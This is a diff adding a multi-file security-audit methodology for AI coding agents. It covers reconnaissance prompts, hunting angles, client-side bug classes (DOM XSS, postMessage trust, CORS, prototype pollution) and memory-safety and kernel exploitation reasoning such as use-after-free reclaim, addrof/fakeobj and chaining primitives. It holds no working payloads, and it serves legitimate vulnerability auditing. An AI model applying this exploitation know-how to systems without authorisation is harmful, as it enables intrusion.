+IMPORTANT: For any finding this agent reports, it must verify the full code path, not just surface appearance. If a cookie is missing `HttpOnly`, check whether the cookie contains security-sensitive data and whether JS needs to read it by design. If an error message contains a field name, check whether the field is ever actually populated with sensitive data. A flag is not a finding — trace the impact before reporting.

--- a/.agents/skills/security-audit/CLIENT-SIDE.md
+++ b/.agents/skills/security-audit/CLIENT-SIDE.md
@@ -1,0 +1,67 @@
+# Client-Side and Browser Hunting
+
+#### When to use this file
+
+Reach for this file when meaningful trust decisions or untrusted rendering happen in the browser: single-page apps, browser extensions, embedded webviews, and anything that renders attacker-influenceable content into the DOM, receives cross-window messages, opens WebSockets, or serves credentialed cross-origin responses. These bugs live in code the server never executes — the fragment after `#`, `window.name`, a `postMessage` payload — so server-side escaping and the classes in `ATTACK-CLASSES.md` don't cover them.
+
+Use alongside `ATTACK-CLASSES.md`. The injection class there covers server-side sinks; this file covers the browser-side source→sink paths, cross-origin trust, and UI-redress classes that only exist client-side.
+
+Pick the relevant classes based on Phase 1. Split per surface (DOM rendering, message/WebSocket handlers, auth-carrying endpoints) for large front-ends.
+
+## Core discipline (include in every agent prompt for this domain)
+
+```
+- Client-side taint needs a controllable SOURCE and an executing SINK on the client path. A source with no sink, or a sink fed only server-rendered trusted data, is not a finding. Name both and show untrusted data reaching the sink unsanitized.
+- The impact must cross to a victim or cross an origin. XSS in the attacker's own DOM, or a "leak" of the attacker's own data, is not a finding. State whose session executes it or whose cross-origin data it steals.
+- Framework auto-escaping is a real mitigation. React/Vue/Angular escape interpolation by default — the finding is where the code opts OUT (`dangerouslySetInnerHTML`, `v-html`, `bypassSecurityTrust*`, `$sce.trustAs*`). Do not report escaped interpolation.
+- A missing header or attribute (X-Frame-Options, frame-ancestors, rel=noopener, SameSite) is only a finding with a concrete sensitive action behind it. A bare missing flag with no state-changing action or credentialed cross-origin read is a hardening note.
+```
+
+## DOM-based injection attack classes (subagent_type: `general`)
+
+**DOM-based XSS**
+Trace client-side sources — `location.hash`/`search`/`href`/`pathname`, `document.referrer`, `window.name`, `postMessage` data, `document.cookie` — into execution sinks: `innerHTML`/`outerHTML`, `document.write`, `eval`, `Function`, `setTimeout`/`setInterval` with a string argument, `element.src`/`href` set to a `javascript:` URI, jQuery `$(...)`/`.html()`, or framework escape hatches (`dangerouslySetInnerHTML`, `v-html`, `bypassSecurityTrustHtml`). The bug is source→sink with no sanitization *on the client path*; server-side escaping never sees fragment or `window.name` data.
+
+**DOM clobbering**
+Attacker-injected `id`/`name` attributes — surviving an HTML sanitizer that strips script but allows attributes — that shadow a global the script later reads (`window.config`, a `form.action`, a flag checked before initialization). Look for code reading `window.X`/`document.X` that an injected element named `X` can override. Requires a markup-injection sink that permits `id`/`name`.
+
+## Client-side trust and messaging attack classes (subagent_type: `general`)
+
+**postMessage origin trust**
+A `message` handler that acts on `event.data` (writes the DOM, calls a privileged function, stores a token) without checking `event.origin` against an allowlist, or with a weak check (`indexOf`, `startsWith`, unanchored regex, `endsWith` on the host). Also the send side: `postMessage(data, '*')` leaking data to any embedder. Confirm the handler does something security-relevant with the data.
+
+**Cross-site WebSocket hijacking (CSWSH)**
+A WebSocket handshake authenticated only by ambient cookies, with no `Origin` check and no per-session CSRF token — an attacker page opens a socket in the victim's authenticated context and reads/writes their data. Find the upgrade handler; check whether it validates `Origin` and binds to a token, not just the cookie.
+
+**CORS with credentials**
+A server that reflects the request `Origin` into `Access-Control-Allow-Origin` while sending `Access-Control-Allow-Credentials: true`, or allowlists `null` or a weak suffix match — any origin then reads authenticated responses. The finding is reflection or weak-match *with credentials*, not a wildcard alone (`*` with credentials is rejected by browsers).
+
+## UI-redress and navigation attack classes (subagent_type: `general`)
+
+**Clickjacking**
+A state-changing action (transfer, delete, grant, confirm) reachable in a framed page with no `X-Frame-Options: DENY`/`SAMEORIGIN` and no `frame-ancestors` CSP and no UI framebusting. A missing frame guard on a read-only page with no sensitive action is not a finding — require the action.
+
+**Reverse tabnabbing**
+A link whose target is attacker-influenceable, opened with `target="_blank"`, letting the opened page rewrite `window.opener.location` to a phishing origin. Modern browsers imply `noopener` for `target="_blank"`, so this is a finding only where the code sets `rel="opener"` explicitly, uses `window.open` without `noopener`, or the threat model includes older browsers — check before reporting.
+
+**Client-side open redirect / navigation**
+A navigation built from a client source (`location = params.get('next')`, `location.hash` fed into `location.href`, a router redirect) with no allowlist — including `javascript:`/`data:` schemes that promote the redirect into XSS. Distinct from a server open-redirect: the sink is in JS, so the server never sees it.
+
+## Prototype pollution attack classes (subagent_type: `general`)
+
+**Prototype pollution and gadget chain**
+An attacker-controlled key (`__proto__`, `constructor.prototype`) reaching a *nested/recursive* write — a deep merge, `lodash.set`-style path assignment, `obj[a][b]=v` with an attacker-controlled segment, or a query-string parser that builds nested objects — that lands on `Object.prototype`. A plain `JSON.parse` or shallow `Object.assign` does NOT pollute. Require the recursive sink AND a gadget that reads the polluted property (an options object checked with `opts.isAdmin`, a template reading a config default, a sink that concatenates a polluted `src`). Pollution with no reachable gadget is not exploitable; the gadget is what turns it into XSS, auth bypass, or (in Node) RCE.
+
+## Universal moves (apply across the above)
+
+- **Start from the sink and walk back to a client source.** Grep the execution sinks (`innerHTML`, `eval`, `document.write`, `dangerouslySetInnerHTML`, `postMessage`, `new WebSocket`) and trace each argument back to `location`/`name`/`referrer`/message data. A sink fed only server-rendered trusted data is not a finding.
+- **Server escaping ends where the fragment begins.** Data after `#`, plus `window.name` and cross-window messages, never reaches the server — so server-side filters can't see it. That blind spot is the DOM-XSS goldmine.
+- **Enumerate the escape hatches.** In an auto-escaping framework, the candidate list *is* every `dangerouslySetInnerHTML`/`v-html`/`bypassSecurityTrust*`/`$sce.trustAs*` call. Start there.
+
+## Validation rules (apply before reporting ANY finding here)
+
+1. **Confirm a controllable source AND an executing sink on the client path.** Cite the source (`location.hash`, `event.data`, `window.name`) and the sink (`innerHTML`, `eval`, navigation), and show untrusted data reaching the sink without sanitization. A source with no sink, or a sink fed only trusted data, is not a finding.
+2. **For prototype pollution, prove the recursive write AND a gadget.** Show the nested/recursive assignment that reaches `Object.prototype`, then the code that later reads the polluted property to a security-relevant effect. Pollution with no reachable gadget is not exploitable.
+3. **For messaging / CORS / WebSocket, show the origin check is absent or weak.** Cite the handler and the missing or `indexOf`/`startsWith`/unanchored-regex origin check, and that the data drives a security-relevant action or a credentialed cross-origin read. Reflection plus credentials, not a bare wildcard.
+4. **For UI-redress, require the sensitive action behind the missing guard.** Name the state-changing action that gets framed (clickjacking) or the attacker-controlled `_blank` link (tabnabbing). A missing `X-Frame-Options`/`rel=noopener` with nothing sensitive behind it is a hardening note — and framebusting, `frame-ancestors`, or the browser's `noopener` default may already defeat it. Check before reporting.
+5. **Return ONLY confirmed findings** with the client source→sink path and whose session it fires in — or "No exploitable client-side issues found" if that's honest.

--- a/.agents/skills/security-audit/HUNTING.md
+++ b/.agents/skills/security-audit/HUNTING.md
@@ -1,0 +1,110 @@
+# Vulnerability Hunting
+
+### Phase 2: Hunt for vulnerabilities
+
+Launch **multiple `general` agents in parallel** via the Task tool. Use `general`, not `research` — general agents can spawn their own sub-agents via the Task tool, so when a hunter finds a rabbit hole that needs deeper investigation (e.g., tracing injection into an auth subsystem it doesn't fully understand), it can spin up a focused `research` sub-agent rather than trying to do everything in one context window.
+
+Each agent gets the architecture summary from Phase 1 injected into its prompt plus the hunting methodology and validation rules. Launch them in a single message so they run concurrently.
+
+**How many agents?** Use Phase 1 to decide. More focused agents produce better results than broad ones that run out of context. For a small library, 3-4 agents may suffice. For a large application with distinct subsystems, launch 8-12+ — split by attack class AND by subsystem. If Phase 1 revealed an auth system, a plugin system, a media pipeline, and a comment engine, each of those could warrant its own injection agent, its own logic agent, etc.
+
+Every agent prompt MUST include:
+1. The architecture summary from Phase 1 (copy it in verbatim)
+2. The specific attack class and scope to investigate
+3. Relevant file paths from Phase 1 as starting points
+4. The hunting methodology (below)
+5. The validation rules (below)
+
+#### Hunting methodology — include in every Phase 2 agent prompt
+
+Tell each agent to think like an attacker, not a code reviewer:
+
+```
+## How to hunt
+
+Don't just check if defenses exist. Try to break them.
+
+READ THE CODE AT DEPTH. Don't stop at the first function. Follow the data through
+every layer — from the entry point through validation, transformation, storage, retrieval,
+and output. Bugs live in the gaps between layers.
+
+Think about these angles:
+
+1. THE HAPPY PATH IS DEFENDED. ATTACK THE SAD PATH.
+   Error handlers, fallback branches, catch blocks, default cases, timeout paths,
+   retry logic, cleanup routines. What happens when things fail? Are errors handled
+   with the same rigor as success? Does a failed validation leave state half-modified?
+
+2. WHAT HAPPENS AT BOUNDARIES?
+   Empty input. Maximum-length input. Null vs undefined vs missing. Zero. Negative numbers.
+   Unicode edge cases. The first item and the last item. One more than the maximum. Exactly
+   at the rate limit. The moment a token expires.
+
+3. WHAT DO COMPONENTS ASSUME ABOUT EACH OTHER?
+   Does the database layer assume the API layer validated input? Does the renderer assume
+   content was sanitized on write? Does the auth middleware assume routes register themselves
+   correctly? Find where trust is implicit and test whether it's justified.
+
+4. WHAT IF OPERATIONS HAPPEN IN THE WRONG ORDER?
+   Call step 3 before step 1. Call delete during create. Send the callback before the request.
+   Hit the confirmation endpoint without starting the flow. Replay a completed flow.
+
+5. WHAT IF TWO THINGS HAPPEN AT ONCE?
+   Two requests to the same resource. Modify while reading. Delete while iterating.
+   Publish while someone else is editing. Two users claiming the same unique resource.
+
+6. WHERE DO TWO PARSERS OR VALIDATORS DISAGREE?
+   Input accepted by the schema but rejected by the database. URL parsed differently by
+   the router vs the application code. Content-type header says one thing, body is another.
+   Filename extension vs MIME type vs magic bytes.
+
+7. WHAT SURVIVES A ROUND TRIP?
+   Data stored then retrieved — is it the same? Does encoding change? Does escaping
+   double-up? Is a relative path resolved differently on read vs write? Does serialization
+   lose type information?
+
+8. WHAT DOES THE CONFIGURATION CONTROL?
+   What happens when config is missing or default? Can an environment variable override a
+   security control? Does a feature flag disable validation? What's the security posture
+   during setup/first-run before config is complete?
+
+9. FOLLOW THE MONEY (OR THE PRIVILEGE).
+   For every operation that changes state, ask: who authorized this? Trace back to the
+   permission check. Is it checking the right permission? Is it checking against the right
+   resource? Is there a parallel path to the same state change that checks differently
+   or not at all?
+
+10. LOOK FOR LEAKED CONTEXT.
+    Error messages that reveal internal paths. Stack traces in production. Timing differences
+    that reveal whether a record exists. Response size differences. HTTP headers that
+    disclose versions. Debug endpoints that survived into production.
+
+11. WHAT PARAMETERS OVERRIDE SECURITY-RELEVANT DEFAULTS?
+    Where a default is safe but a user-supplied parameter can change it. Look for
+    every input that overrides a security-relevant default and check if the override
+    is gated by appropriate permissions.
+
+12. WHERE DO UNVERIFIED CLAIMS DRIVE TRUST DECISIONS?
+    Anywhere self-declared identity, capability, or metadata influences an access
+    or trust decision without independent verification.
+
+GO DEEP, AND PROVE IT. You can spawn sub-agents: if evaluating a candidate finding needs
+deep understanding of a subsystem, use the Task tool to launch a research agent instead of
+holding everything in one context. And where the code is locally runnable, don't just reason
+about it — extract the suspect function into a minimal harness (or build and run the target)
+and test the hypothesis directly. A reproduced result beats an argued one.
+
+YOUR SCOPE IS YOUR PRIMARY FOCUS, NOT A BOUNDARY.
+If while investigating your assigned area you notice something wrong in a different
+category — a permission issue while tracing injection, a race condition while reviewing
+auth — report it. Don't ignore a bug because it's "not your area." Attackers don't
+respect category boundaries.
+
+## Validation rules — apply before reporting ANY finding
+1. You MUST construct a concrete attack (exact inputs, requests, or action sequence)
+2. The attack MUST achieve meaningful impact (not just "learn field names" or "cause an error")
+3. Check if another layer already prevents exploitation — if so, it's a hardening note, not a finding
+4. If the baseline comparable has the same pattern, note whether it's been exploited there
+5. If your exploit depends on parser/runtime behavior, verify against the relevant spec or implementation — do not reason from intuition.
+6. Return ONLY confirmed findings with concrete attacks, or "No exploitable vulnerabilities found" if that's honest.
+```

--- a/.agents/skills/security-audit/MEMORY-SAFETY-AND-BINARY.md
+++ b/.agents/skills/security-audit/MEMORY-SAFETY-AND-BINARY.md
@@ -1,0 +1,58 @@
+# Memory Safety, Binary, and Kernel Hunting
+
+#### When to use this file
+
+The attack classes in `ATTACK-CLASSES.md` are tuned for web apps, APIs, and services. Reach for *this* file when the target processes untrusted bytes in a memory-unsafe context: C/C++/Objective-C, Rust `unsafe`, kernel modules and drivers, parsers and decoders (image/video/font/archive/PDB), reverse-engineering and dev tooling, network daemons, firmware, and language runtimes/JITs. These targets fail differently from web apps — the bug is a memory corruption or a logic error in privileged code, not an injection or an access-control gap — so the hunt needs a different lens.
+
+Pick the relevant classes based on Phase 1. Split per subsystem for large targets.
+
+## Core discipline (include in every agent prompt for this domain)
+
+```
+- A buffer sized for the common case can still overflow on adversarial input. Verify every "this length is bounded" claim against the WORST case, not the happy path.
+- "Huge count = guaranteed crash" is FALSE. An oversized copy length is size- and libc-dependent: it often faults, but the copy primitive can also wrap or land a short, scattered write first. Determine the actual write behavior before downgrading to DoS-only.
+- Static offsets are a guess; the crash dump is truth. An unreproduced bug is not a bug — if you claim exploitability, say exactly which input reaches which sink and what the observable result is.
+- Sanitizer silence ≠ safety where the deref is outside instrumented code (hand-written asm, JIT-emitted, intra-allocation). Don't trust a clean ASan run for those.
+```
+
+## Memory-safety attack classes (subagent_type: `general`)
+
+**Spatial: out-of-bounds read/write**
+- **Length subtraction underflow** — a copy/loop bound is `a - b` (`uri.len - prefix`, `total - consumed`) where the attacker can make `b > a`. Negative → casts to ~SIZE_MAX. Map which bytes land where; don't assume "just a crash."
+- **Operator-precedence / multi-term length errors** — an unparenthesized `+`/`-` length chain (`endp - begin + consume`) that silently over-adds when one term is attacker-sized. Audit each CALLER's value of the variable term — the common caller is often correct-by-accident on the zero path and survives testing.
+- **`sizeof(*p)` vs `sizeof(element)` pointer-depth confusion** — an allocation/copy size computed one indirection too deep (`gid_t **` → `sizeof(*p)`=8 not 4). The bounds check passes because it uses the same wrong unit. Compiled tell: `shl $0x3` where `shl $0x2` was meant.
+- **Wire-length into fixed stack buffer** — a function rebuilds a network/user blob into a fixed array using an attacker length field, with the bounds check missing/late or computed on the wrong headroom (a header pre-written into the buffer). Re-derive true headroom (size minus fixed prefix); confirm no guard precedes the copy.
+
+**Temporal: use-after-free / lifetime**
+- **Embedded waiter-anchor freed without draining** — a struct embeds a list head (`selinfo`/`knlist`/timer/knote) reachable by unprivileged poll/select/kqueue, and a free path destroys it but skips the drain a wakeup path does. For every `selrecord(&obj->x)`, require a matching drain on EACH path that can free `obj`.
+- **Cached raw pointer + reallocating owner** — a view caches `base+offset`, a grow/realloc path moves the backing store, and the invalidation walks only the *current* wrapper's view set while grow *replaces* the wrapper. The original view dangles.
+
+**Type confusion**
+- **Read-and-write confusion → addrof/fakeobj** — a confusion that reads a pointer slot as a scalar (addrof) and writes a scalar into a pointer slot (fakeobj). The standard pivot of runtime/JIT exploitation; the prior art is about the PROBLEM CLASS (NaN-boxing, cached typed-array data pointer), not the specific target.
+- **Hierarchical-walker leaf check skipped** — a page-table / nested / B-tree / extent walker checks the valid bit but not the leaf/size bit at level N, then descends treating an attacker-owned leaf as an interior node.
+
+**Value: uninitialized & oracle**
+- **Uninitialized worst-case buffer + observable compare = read oracle** — a buffer sized to a MAX constant is partially written, then compared against attacker bytes with an attacker-controlled compare length where match/no-match is observable. No memory-disclosure bug needed; the gap between actual output and MAX-size is the leak window. Brute one byte/connection, hint the structural bits, parallelize.
+
+## Kernel & privileged-interface attack classes (subagent_type: `general`)
+
+- **User-copy bounds + double-fetch (TOCTOU)** — a syscall/ioctl/Mach-trap entry whose user-copy primitive (`copyin` / `copy_from_user`) brings attacker memory in, then re-reads the SAME user address after a check. Any fact derived from concurrently-mutable user memory and trusted on a later pass is a double-fetch even when each op is individually correct.
+- **Object lifecycle / UAF (IOKit/OSObject and friends)** — unbalanced retain/release on an externally-reachable object; a method that releases on one path but a sibling dispatch (compat/fallback/ptrace) forgot it. Diff the duplicated dispatch paths.
+- **Unchecked downcast / type confusion** — `OSDynamicCast` (or any tagged-union cast) whose result is used without a null check, or a selector/index into a dispatch table without a bounds check.
+- **World-writable / under-permissioned powerful interface** — a device node, admin socket, or mgmt API exposed more broadly than its power, that validates the request SHAPE (index in range) but never the requester's AUTHORITY over the named resource. Danger = power × reachability; enumerate the surface reachable from the *actual* untrusted context first.
+- **Validate-then-act-on-stale-state** — a fast path and a compat/ptrace/fallback path to the same operation where one copy forgot a guard the other performs.
+
+## Universal moves (apply across the above)
+
+- **Audit the incomplete fix.** A targeted patch is a high-signal pointer to a dangerous sink with the analysis already done. Read the diff → find the exact sink it hardened → scan the same function, parallel paths, and alternate callers for the SAME tainted-data-to-sink shape the patch missed. Incomplete fixes are their own bug class.
+- **Trust asymmetry between two ends of a protocol.** A filter/verification/size-cap installed on one side of a connection but missing on the symmetric call on the other. Find the protective call → grep its mirror on the opposite role → if absent, the earliest unprotected pre-auth parse is the prize. A malicious server/MITM is a real attacker.
+- **Chain a weak primitive.** A blocked path means you haven't found the right pivot, not that it's unexploitable. Always ask "what does this actually let me do, and what runs automatically once I can put bytes on disk?" (plugin dirs, autoload, `.git/hooks`, `conftest.py`).
+- **Hunt where the crowd isn't.** The tools researchers themselves trust — debuggers, disassemblers, scanners, dev tooling — are under-audited and high-impact. Old code and obscure formats are gold.
+
+## Validation rules (apply before reporting ANY finding here)
+
+1. **Build a debuggable target first.** Wire in crash dumps + a debugger before you claim exploitability. You can't iterate on what you can't observe.
+2. **Read the offset from the crash, not the disassembly.** Send a cyclic (De Bruijn) pattern; the faulting register values give the exact offset. A variable-length prefix (handle, optional field, padding) shifts the geometry off the static prediction.
+3. **Prove a UAF by reclaim-and-compare** when the sanitizer is blind (asm/JIT/intra-allocation): trigger the dangling view, reclaim the freed region with a size-matched content-controlled allocation, write through the dangler, read the reclaimer back — aliasing either way proves it.
+4. **Distinguish crash from exploitable.** For an OOB write, map which bytes land where and whether a security-relevant field is reachable; for a "huge count," prove the bounded-write case before calling it DoS-only.
+5. **Return ONLY confirmed findings** with the exact input → sink path and the observable result, or "No exploitable memory-safety issues found" if that's honest.

--- a/.agents/skills/security-audit/RECONNAISSANCE.md
+++ b/.agents/skills/security-audit/RECONNAISSANCE.md
@@ -1,0 +1,46 @@
+# Reconnaissance
+
+### Phase 1: Understand the application
+
+Before looking for bugs, understand what you're auditing. This requires depth, not just a directory listing. Launch **multiple `research` agents in parallel** to map different aspects of the codebase:
+
+**Agent 1a: Overview, tech stack, and comparable baseline**
+```
+Explore the codebase at <path>. Answer:
+1. What is this application? What kind of software? (web app, API, CLI tool, library, daemon, desktop app, mobile backend, etc.)
+2. Who uses it and how? (end users, developers, operators, other services)
+3. What's the tech stack? (languages, frameworks, databases, runtime, deployment model)
+4. What comparable mainstream software exists? What security tradeoffs does the comparable accept?
+5. What's the high-level directory structure?
+Return specific file paths for key entry points.
+```
+
+**Agent 1b: Trust boundaries and access control**
+```
+Explore the codebase at <path>. Find and read ALL code related to:
+1. Trust boundaries — where does untrusted input enter the system? (HTTP requests, CLI args, file reads, IPC, message queues, environment variables, config files, etc.)
+2. Authentication — how do callers prove identity? (sessions, tokens, API keys, mTLS, Unix sockets, etc.) If there's no authentication, note that.
+3. Authorization — how are permissions enforced? (middleware, decorators, capability checks, file permissions, etc.) If there's no authorization model, note that.
+4. Privilege separation — does the code run as root? Drop privileges? Use sandboxing? Fork workers?
+5. Any bypass mechanisms (dev-only modes, test helpers, setup flows, debug flags)
+Return the trust model: who are the actors, what can each do by design, and which code enforces it. Include specific file paths and line numbers.
+```
+
+**Agent 1c: Input surface inventory**
+```
+Explore the codebase at <path>. Produce a complete inventory of where external input enters the system:
+1. Network-facing surfaces (HTTP endpoints, gRPC services, WebSocket handlers, TCP/UDP listeners, etc.) — list each with method/verb and purpose
+2. File-based input (file uploads, config file parsing, log ingestion, import/export, etc.)
+3. IPC and inter-service input (message queues, shared memory, Unix sockets, environment variables, CLI arguments)
+4. User-generated content surfaces (anywhere users provide content that is stored and later rendered, served, or processed)
+5. External integrations (OAuth, webhooks, third-party APIs, plugin loading, dynamic code execution)
+6. All places where input reaches dangerous sinks (SQL/query builders, HTML/template output, file paths, shell commands, deserialization, eval, dynamic imports)
+Return specific file paths. Be exhaustive.
+```
+
+Collect all three agents' outputs and synthesize them into `<output-dir>/architecture.md`:
+- 1-2 page structured summary covering application type, tech stack, trust model, input surfaces, and baseline comparable
+- Include the key file paths from all agents — these become the starting points for Phase 2
+- This document is injected verbatim into every Phase 2 agent prompt
+
+If Phase 1 agents reveal the codebase is larger or more complex than expected (e.g., plugin system, multi-tenant architecture, complex auth chains, multiple deployment targets), launch additional `research` agents to map those areas before proceeding. The quality of Phase 2 depends entirely on the quality of Phase 1.

--- a/.agents/skills/security-audit/SKILL.md
+++ b/.agents/skills/security-audit/SKILL.md
@@ -1,0 +1,112 @@
+---
+description: Security audit of a codebase — web apps, APIs, services, CLI tools, libraries, daemons, and more. Use when asked to find security bugs, do a security review, audit for vulnerabilities, or pen-test the code. Focuses on exploitable issues with real impact, not theoretical concerns or industry-standard behavior.
+metadata:
+    github-path: skills/security-audit
+    github-ref: refs/heads/main
+    github-repo: https://github.com/cloudflare/security-audit-skill
+    github-tree-sha: bf8273f4614739db4c8535a5ab43f3a471b974b8
+name: security-audit
+---
+# Security Audit
+
+You are a security auditor. Your job is to find **exploitable vulnerabilities with real impact**.
+
+## Platform terminology
+
+This skill is agent-neutral. In the methodology:
+
+- **Task tool** means the coding agent's delegation or sub-agent mechanism.
+- **`research` agent** means a delegated agent optimized for focused codebase exploration and factual verification.
+- **`general` agent** means a delegated agent that can investigate broadly and spawn focused research agents.
+- **`subagent_type`** means the equivalent delegated-agent role supported by the current platform.
+
+Use the platform's equivalent capabilities while preserving the specified roles, parallelism, prompts, and independence boundaries.
+
+## Setup
+
+Before starting, establish two paths:
+- **Target**: the codebase to audit (from the user's request or the current working directory)
+- **Output directory**: where all audit artifacts go. Ask the user if not specified, or default to `~/security-audit-skill/<repo-name>/run-<N>` where `<N>` is the next unused integer (check what exists with `ls`). Create it if it doesn't exist. This ensures multiple runs against the same repo produce separate results.
+
+All files written during the audit go in the output directory:
+- `architecture.md` — Phase 1 output, fed into Phase 2 agent prompts
+- `REPORT.md` — human-readable report (Phase 4)
+- `FINDINGS-DETAIL.md` — detailed data flows for MEDIUM+ findings (Phase 4)
+- `findings.json` — machine-readable structured output (Phase 5)
+
+Subagents (Phases 1, 2, 3, 6) do NOT write files — they return results to you via the Task tool. You are responsible for writing all files to the output directory.
+
+### Coverage and prior runs
+
+Each audit run explores different code paths depending on which agents find what and where they dig. No single run finds everything. Testing shows the best single run finds roughly half the total vulnerabilities across multiple runs.
+
+**If prior runs exist** for the same repo (check `~/security-audit-skill/<repo-name>/`), read their `findings.json` files before starting Phase 2. Use them to:
+1. **Skip known findings** — don't waste agents re-discovering the same status bypass. Mention prior findings in the report but focus hunting effort on new ground.
+2. **Target gaps** — if prior runs focused heavily on injection and auth, weight this run toward business logic, creative attacks, and the wildcard agent. If prior runs missed public endpoints, focus there.
+3. **Resolve disagreements** — if prior runs gave conflicting verdicts on the same finding, validate it definitively.
+
+Include a brief summary of prior runs in the architecture summary so Phase 2 agents know what's already been found.
+
+**If no prior runs exist**, note in the report that coverage improves with additional runs and recommend the user run the audit again to catch findings this run may have missed.
+
+## Core Principles
+
+### Only report what you can exploit
+
+Every finding must have a concrete attack scenario: who is the attacker, what do they do, and what do they get? "An attacker could theoretically..." is not a finding. "Send this request, get this result" is.
+
+### Confirm dynamically when you can
+
+This is a source-first audit, but a claim you can execute beats one you can only argue. Where the target is locally buildable — a parser, a library, a CLI, a native component — build and run it: reproduce the crash, run the payload, diff the two parsers on the same bytes. Better still, **extract the suspect code into a minimal standalone harness** and test the hypothesis in isolation — fuzz the one function, feed it the crafted input, watch what it does. Where confirmation needs infrastructure you don't have — a proxy chain, a live cache, production auth — you cannot confirm from source alone: mark it "requires deployment testing" and do not report it as confirmed. Dynamic evidence is what resolves the memory-safety and request-framing classes that static reading leaves ambiguous.
+
+### Determine the baseline dynamically
+
+In Phase 1, identify what this application is and what comparable applications exist. Use those comparables to calibrate -- not to dismiss findings, but to focus effort. If the comparable has the same pattern and it's been exploited there, that's a STRONGER finding, not a weaker one. If the comparable has the same pattern and nobody's ever exploited it in 20 years, you should understand why before reporting it.
+
+Do NOT hardcode a specific comparable. A CMS gets compared to other CMSes. An API gateway gets compared to other API gateways. A novel application may have no meaningful comparable.
+
+### Defense-in-depth gaps are not vulnerabilities
+
+If Layer A prevents the attack, the absence of Layer B is a hardening note, not a finding. Report it separately if you want, but do not inflate its severity.
+
+### Severity requires impact
+
+Severity is the combination of **likelihood** (how easy to exploit, what access is needed) and **impact** (what damage is achieved). Use both axes:
+
+- **CRITICAL**: Unauthenticated RCE, full database dump, admin account takeover without credentials
+- **HIGH**: Authenticated RCE, SQL injection with data exfiltration, stored XSS that fires for all users, auth bypass. Also: any finding where the RBAC/permission model is *completely* defeated for an action — e.g., a user can perform an action that the system explicitly gates behind a higher role, and the action has real consequences (publishing content, deleting resources, modifying other users' data).
+- **MEDIUM**: Targeted XSS requiring specific conditions, CSRF with meaningful state change, information disclosure of secrets/credentials. Also: business logic bypasses with real but limited consequences — e.g., the action is possible but requires authentication, or the impact is confined to the attacker's own data, or the bypass requires uncommon conditions.
+- **LOW**: Information disclosure of non-secret data, DoS requiring sustained effort
+- **INFORMATIONAL**: A confirmed but minimal-impact observation with no standalone exploit — useful mainly as a building block for another finding. Pure defense-in-depth gaps belong in hardening notes, not here.
+
+The key distinction between HIGH and MEDIUM for business logic findings: **does the finding defeat an explicit security boundary?** Defeating one — acting past a role the system explicitly enforces — is HIGH; a data inconsistency, a finding that requires privileged access to exploit, or one with limited blast radius is MEDIUM.
+
+If you cannot describe the concrete damage an attacker achieves, the severity is probably lower than you think.
+
+These principles are enforced operationally by the **validation rules in [HUNTING.md](HUNTING.md)** — the canonical bar every hunter applies before reporting a finding, and that Phase 3 re-applies adversarially. The domain companion files add domain-specific checks on top of that bar; they do not replace it.
+
+## Workflow overview
+
+Follow all six phases in order:
+
+1. **Recon** — Run Phase 1 from [RECONNAISSANCE.md](RECONNAISSANCE.md) to map the application's architecture, trust boundaries, and input surfaces.
+2. **Hunt** — Use [HUNTING.md](HUNTING.md) for Phase 2 orchestration, methodology, and validation rules; select scopes from [ATTACK-CLASSES.md](ATTACK-CLASSES.md), which routes native, AI/LLM, HTTP-protocol/auth, and client-side targets to specialized companion files ([MEMORY-SAFETY-AND-BINARY.md](MEMORY-SAFETY-AND-BINARY.md), [AI-AND-LLM.md](AI-AND-LLM.md), [WEB-PROTOCOL-AND-AUTH.md](WEB-PROTOCOL-AND-AUTH.md), [CLIENT-SIDE.md](CLIENT-SIDE.md)).
+3. **Validate** — Use Phase 3 in [VALIDATION-AND-REPORTING.md](VALIDATION-AND-REPORTING.md) to consolidate duplicates and independently try to disprove every finding.
+4. **Report** — Use Phase 4 in [VALIDATION-AND-REPORTING.md](VALIDATION-AND-REPORTING.md) to write `REPORT.md` and `FINDINGS-DETAIL.md`.
+5. **Structured output** — Use Phase 5 in [VALIDATION-AND-REPORTING.md](VALIDATION-AND-REPORTING.md), `report-schema.json`, and `validate-findings.cjs` to write and validate `findings.json`.
+6. **Independent verification** — Use Phase 6 in [VALIDATION-AND-REPORTING.md](VALIDATION-AND-REPORTING.md) to verify every factual claim and reconcile all outputs.
+
+## Anti-Patterns to Avoid
+
+These are the mistakes that make security audits useless:
+
+1. **Listing everything that deviates from OWASP as a finding.** OWASP is a checklist, not a bug list. Every real application makes tradeoffs.
+2. **Rating defense-in-depth gaps as HIGH/CRITICAL.** "Missing validateIdentifier where the query builder already quotes identifiers" is not HIGH severity.
+3. **Ignoring the deployment model.** Rate limiting at the CDN layer is a valid architecture. Not every app needs application-level rate limiting.
+4. **Treating designed behavior as a bug.** Understand the trust model before auditing. If the design says admins are fully trusted, admin-does-admin-things is not a finding.
+5. **Padding the report with LOW findings to look thorough.** Ten LOWs don't make a useful report. Three MEDIUMs do.
+6. **"Potential" findings without proof.** Either you can exploit it or you can't. If you need the word "potentially" or "theoretically", you haven't done enough research.
+7. **Ignoring what the codebase does well.** If auth is solid, say so. It builds trust in the findings you DO report and helps the team prioritize.
+8. **Constructing exploits from incorrect parser/runtime assumptions.** The most convincing false positives come from reasoning "the parser/runtime will interpret this as..." without verifying. If your exploit depends on parser or runtime behavior, cite the spec or test it. Don't assume.
+9. **Skipping business logic and creative attacks.** The standard vulnerability classes (SQLi, XSS, SSRF) are what every scanner checks. The value of a manual audit is finding the things scanners can't: logic errors, state machine violations, chained attacks, implicit trust assumptions.
+10. **Giving up too easily.** "The codebase uses parameterized queries so there's no SQL injection" is a lazy conclusion. Check EVERY use of sql.raw(). Check dynamic identifiers. Check search/FTS. Check if there's a code path that bypasses the query builder. Push.

--- a/.agents/skills/security-audit/VALIDATION-AND-REPORTING.md
+++ b/.agents/skills/security-audit/VALIDATION-AND-REPORTING.md
@@ -1,0 +1,109 @@
+# Validation, Reporting, and Verification
+
+### Phase 3: Validate findings
+
+Collect all findings from Phase 2 agents and **consolidate duplicates first**. Phase 2 deliberately overlaps agent scopes, so the same issue is frequently reported by more than one hunter — merge findings that share a root cause before validating, or you'll validate and report the same bug multiple times. For each remaining finding, launch a **separate `research` validation agent** that tries to disprove it. The hunting agents are biased toward finding things; the validation agents are biased toward killing false positives. This adversarial step is critical.
+
+For findings from the same attack surface, batch them into one validation agent. Launch validation agents in parallel where they cover independent areas.
+
+Each validation agent prompt should:
+1. State the specific finding being validated (title, claimed attack, claimed impact)
+2. Ask the agent to read the exact code paths and verify each step of the trace
